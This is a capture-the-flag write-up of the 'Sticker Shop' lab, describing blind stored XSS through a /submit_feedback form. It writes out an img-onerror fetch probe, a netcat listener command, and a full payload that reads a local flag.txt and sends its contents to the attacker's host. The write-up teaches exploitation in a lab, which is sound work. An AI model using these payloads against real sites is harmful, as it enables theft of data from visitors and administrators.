The Sticker Shop
Can you exploit the sticker shop in order to capture the flag?
Starting task, as we are going to face with a server run by a Local Sticker Shop hosted. I started the machine and jump over it.
The first step I took is to visit the website and looked for the source and found /submit_feedback dir, which catched me.
And I visited to /submit_feedback and found a submition functionality available.
As soon I saw this, I just started to try random XSS payloads, from payloadbox/xss-payload-list, and cam to this payload..
<img src=x onerror="fetch('<ip>:8080')"/>
[!NOTE] In the above payload an image would be loaded as img tag refers to X location, since the src fail to load and it simply goes to execute following and we just can grap the http request using
ncfetch('http://<ip>:8080');
And I just nc the headers before the submition of the payload, and yeah like this !!!
nc -knvlp 8080
| Now to grab the flag I have used the following payload.. |
<img src="x" onerror="fetch('http://127.0.0.1:8080/flag.txt').then(r => r.text()).then(r => fetch('http://<ip>:8080/?c=' + r)).catch(e => fetch('http://<ip>:8080/?c=' + e))"/>
[!NOTE] Componenets..
<img src="x" onerror="...">- The imagesrcis invalid, causing theonerrorattribute to execute when the browser fails to load the image.fetch('http://127.0.0.1:8080/flag.txt')- This initiates an HTTP GET request to the victim's localhost at port 8080, targeting theflag.txtfile..then(r => r.text())- If the request succeeds, this processes the response (r) and converts it into text using the.text()method..then(r => fetch('http://<ip>:8080/?c=' + r))- After retrieving the file content, anotherfetchrequest sends the content (r) to the attacker's server (http://<ip>:8080) as part of the query string (?c=...)..catch(e => fetch('http://<ip>:8080/?c=' + e))- If the initialfetchfails (e.g., the file doesn't exist or CORS blocks the request), thecatchblock handles the error and sends the error message (e) to the attacker's server.
Yes! Thank you for reading till here ;)